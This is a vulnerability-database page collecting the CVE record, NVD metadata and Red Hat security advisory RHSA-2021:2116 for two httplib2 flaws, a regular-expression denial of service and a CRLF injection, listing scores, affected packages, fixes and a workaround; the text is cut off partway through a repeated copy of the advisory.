CVE-2021-21240
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T18:09:14.827Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://pypi.org/project/httplib2", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "httplib2", vendor: "httplib2", versions: [ { status: "affected", version: "< 0.19.0", }, ], }, ], descriptions: [ { lang: "en", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-400", description: "CWE-400 Uncontrolled Resource Consumption", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2021-02-08T19:45:19", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { tags: [ "x_refsource_MISC", ], url: "https://pypi.org/project/httplib2", }, ], source: { advisory: "GHSA-93xj-8mrv-444m", discovery: "UNKNOWN", }, title: "Regular Expression Denial of Service in httplib2", x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2021-21240", STATE: "PUBLIC", TITLE: "Regular Expression Denial of Service in httplib2", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "httplib2", version: { version_data: [ { version_value: "< 0.19.0", }, ], }, }, ], }, vendor_name: "httplib2", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "httplib2 is a comprehensive HTTP client library for Python. 
In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, ], }, impact: { cvss: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-400 Uncontrolled Resource Consumption", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", refsource: "CONFIRM", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { name: "https://github.com/httplib2/httplib2/pull/182", refsource: "MISC", url: "https://github.com/httplib2/httplib2/pull/182", }, { name: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", refsource: "MISC", url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { name: "https://pypi.org/project/httplib2", refsource: "MISC", url: "https://pypi.org/project/httplib2", }, ], }, source: { advisory: "GHSA-93xj-8mrv-444m", discovery: "UNKNOWN", }, }, }, }, cveMetadata: { assignerOrgId: "a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2021-21240", datePublished: "2021-02-08T19:45:19", dateReserved: "2020-12-22T00:00:00", dateUpdated: "2024-08-03T18:09:14.827Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", "vulnerability-lookup:meta": { nvd: 
"{\"cve\":{\"id\":\"CVE-2021-21240\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2021-02-08T20:15:12.197\",\"lastModified\":\"2024-11-21T05:47:50.650\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \\\"\\\\xa0\\\" characters in the \\\"www-authenticate\\\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.\"},{\"lang\":\"es\",\"value\":\"httplib2 es una biblioteca cliente HTTP completa para Python. En httplib2 anterior a la versión 0.19.0, un servidor malicioso que responde con una larga serie de caracteres \\\"\\\\xa0\\\" en el encabezado \\\"www-authenticate\\\" puede causar una Denegación de Servicio (CPU quemada mientras analiza el encabezado) del cliente httplib2 que accede a dicho servidor. 
Esto se corrigió en la versión 0.19.0, que contiene una nueva implementación de análisis de encabezados de autenticación usando la biblioteca pyparsing\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:N/I:N/A:P\",\"baseScore\":5.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\"
:true,\"criteria\":\"cpe:2.3:a:httplib2_project:httplib2:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.19.0\",\"matchCriteriaId\":\"D5BA135E-6889-4A5D-88F6-1AD4DBC498BE\"}]}]}],\"references\":[{\"url\":\"https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/pull/182\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"https://pypi.org/project/httplib2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/pull/182\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"https://pypi.org/project/httplib2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\",\"Third Party Advisory\"]}]}}", }, }
rhsa-2021:2116
Vulnerability from csaf_redhat
Notes
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for python-httplib2 is now available for Red Hat OpenStack\nPlatform 16.1 (Train).\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "A comprehensive HTTP client library that supports many features left out of other HTTP libraries.\n\nSecurity Fix(es):\n\n* CRLF injection via an attacker controlled unescaped part of uri for\nhttplib2.Http.request function (CVE-2020-11078)\n\n* Regular expression denial of service via malicious header\n(CVE-2021-21240)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2021:2116", url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_2116.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update", tracking: { current_release_date: "2025-03-14T17:33:12+00:00", generator: { date: "2025-03-14T17:33:12+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.1", }, }, id: "RHSA-2021:2116", initial_release_date: "2021-05-26T11:48:28+00:00", revision_history: [ { date: "2021-05-26T11:48:28+00:00", number: "1", summary: "Initial version", }, { date: "2021-05-26T11:48:28+00:00", number: "2", summary: "Last updated version", }, { date: "2025-03-14T17:33:12+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat OpenStack Platform 16.1", product: { name: "Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1", product_identification_helper: { cpe: 
"cpe:/a:redhat:openstack:16.1::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenStack Platform", }, { branches: [ { category: "product_version", name: "python-httplib2-0:0.13.1-2.el8ost.src", product: { name: "python-httplib2-0:0.13.1-2.el8ost.src", product_id: "python-httplib2-0:0.13.1-2.el8ost.src", product_identification_helper: { purl: "pkg:rpm/redhat/python-httplib2@0.13.1-2.el8ost?arch=src", }, }, }, ], category: "architecture", name: "src", }, { branches: [ { category: "product_version", name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_id: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_identification_helper: { purl: "pkg:rpm/redhat/python3-httplib2@0.13.1-2.el8ost?arch=noarch", }, }, }, ], category: "architecture", name: "noarch", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0:0.13.1-2.el8ost.src as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", }, product_reference: "python-httplib2-0:0.13.1-2.el8ost.src", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", }, product_reference: "python3-httplib2-0:0.13.1-2.el8ost.noarch", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", cwe: { id: "CWE-113", name: "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')", }, discovery_date: "2020-05-20T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1845937", }, ], notes: [ { category: "description", text: "A flaw was found in 
python-httplib2. An attacker controlling an unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", title: "Vulnerability summary", }, { category: "other", text: "While Red Hat Quay 3.0, and 3.1 used the httplib2 library it was removed in versions 3.2 and later. Upgrade to 3.2 or later to fix this vulnerability in Red Hat Quay.\n\nRed Hat Gluster Storage 3 delivers the affected version of the python-httplib2 library. However the library is not used by Gluster hence the impact by this vulnerability is low.\n\nThis issue affects the version of the python-httplib2 library as shipped with Red Hat Ceph Storage (RHCS) version 2. 
Ceph-2 has reached End of Extended Life Cycle Support and no longer fixing moderates/lows.\n\nThere's currently no known vector to exploit this when using Python versions with CVE-2019-9740 and CVE-2019-9947 fixed.\n\nIn Red Hat OpenStack Platform13, because the flaw has a lower impact and the package's indirect usage in RHOSP cannot be exploited, no update will be provided at this time for the RHOSP python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "RHBZ#1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2020-11078", url: "https://www.cve.org/CVERecord?id=CVE-2020-11078", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", url: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", }, ], release_date: "2020-05-20T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", 
"8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.8, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", }, { cve: "CVE-2021-21240", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-02-09T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1926885", }, ], notes: [ { category: "description", text: "An uncontrolled resource consumption flaw as found in python-httplib2, due to a flawed regular expression used while parsing the WWW-Authenticate header in an HTTP response. This flaw allows a malicious or compromised server to reply with a crafted sequence of characters in the WWW-Authenticate header, leading to a denial of service of the httplib2 client accessing the server. The highest threat from this vulnerability is to system availability.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: Regular expression denial of service via malicious header", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a security impact of Low, because it requires a malicious or compromised server in order to be exploited, and it only affects the HTTP client. 
In Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP 13 python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "RHBZ#1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-21240", url: "https://www.cve.org/CVERecord?id=CVE-2021-21240", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, ], release_date: "2021-01-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "workaround", details: "Use strict mode 
to parse WWW-Authenticate headers. This can be done by setting `httplib2.USE_WWW_AUTH_STRICT_PARSING = True`. Please note, however, that strict mode might lead to bad results in case of ill-formed header values.", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "python-httplib2: Regular expression denial of service via malicious header", }, ], }
RHSA-2021:2116
Vulnerability from csaf_redhat
Notes
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for python-httplib2 is now available for Red Hat OpenStack\nPlatform 16.1 (Train).\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "A comprehensive HTTP client library that supports many features left out of other HTTP libraries.\n\nSecurity Fix(es):\n\n* CRLF injection via an attacker controlled unescaped part of uri for\nhttplib2.Http.request function (CVE-2020-11078)\n\n* Regular expression denial of service via malicious header\n(CVE-2021-21240)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2021:2116", url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_2116.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update", tracking: { current_release_date: "2025-03-14T17:33:12+00:00", generator: { date: "2025-03-14T17:33:12+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.1", }, }, id: "RHSA-2021:2116", initial_release_date: "2021-05-26T11:48:28+00:00", revision_history: [ { date: "2021-05-26T11:48:28+00:00", number: "1", summary: "Initial version", }, { date: "2021-05-26T11:48:28+00:00", number: "2", summary: "Last updated version", }, { date: "2025-03-14T17:33:12+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat OpenStack Platform 16.1", product: { name: "Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1", product_identification_helper: { cpe: 
"cpe:/a:redhat:openstack:16.1::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenStack Platform", }, { branches: [ { category: "product_version", name: "python-httplib2-0:0.13.1-2.el8ost.src", product: { name: "python-httplib2-0:0.13.1-2.el8ost.src", product_id: "python-httplib2-0:0.13.1-2.el8ost.src", product_identification_helper: { purl: "pkg:rpm/redhat/python-httplib2@0.13.1-2.el8ost?arch=src", }, }, }, ], category: "architecture", name: "src", }, { branches: [ { category: "product_version", name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_id: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_identification_helper: { purl: "pkg:rpm/redhat/python3-httplib2@0.13.1-2.el8ost?arch=noarch", }, }, }, ], category: "architecture", name: "noarch", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0:0.13.1-2.el8ost.src as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", }, product_reference: "python-httplib2-0:0.13.1-2.el8ost.src", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", }, product_reference: "python3-httplib2-0:0.13.1-2.el8ost.noarch", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", cwe: { id: "CWE-113", name: "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')", }, discovery_date: "2020-05-20T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1845937", }, ], notes: [ { category: "description", text: "A flaw was found in 
python-httplib2. An attacker controlling an unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", title: "Vulnerability summary", }, { category: "other", text: "While Red Hat Quay 3.0, and 3.1 used the httplib2 library it was removed in versions 3.2 and later. Upgrade to 3.2 or later to fix this vulnerability in Red Hat Quay.\n\nRed Hat Gluster Storage 3 delivers the affected version of the python-httplib2 library. However the library is not used by Gluster hence the impact by this vulnerability is low.\n\nThis issue affects the version of the python-httplib2 library as shipped with Red Hat Ceph Storage (RHCS) version 2. 
Ceph-2 has reached End of Extended Life Cycle Support and no longer fixing moderates/lows.\n\nThere's currently no known vector to exploit this when using Python versions with CVE-2019-9740 and CVE-2019-9947 fixed.\n\nIn Red Hat OpenStack Platform13, because the flaw has a lower impact and the package's indirect usage in RHOSP cannot be exploited, no update will be provided at this time for the RHOSP python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "RHBZ#1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2020-11078", url: "https://www.cve.org/CVERecord?id=CVE-2020-11078", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", url: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", }, ], release_date: "2020-05-20T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", 
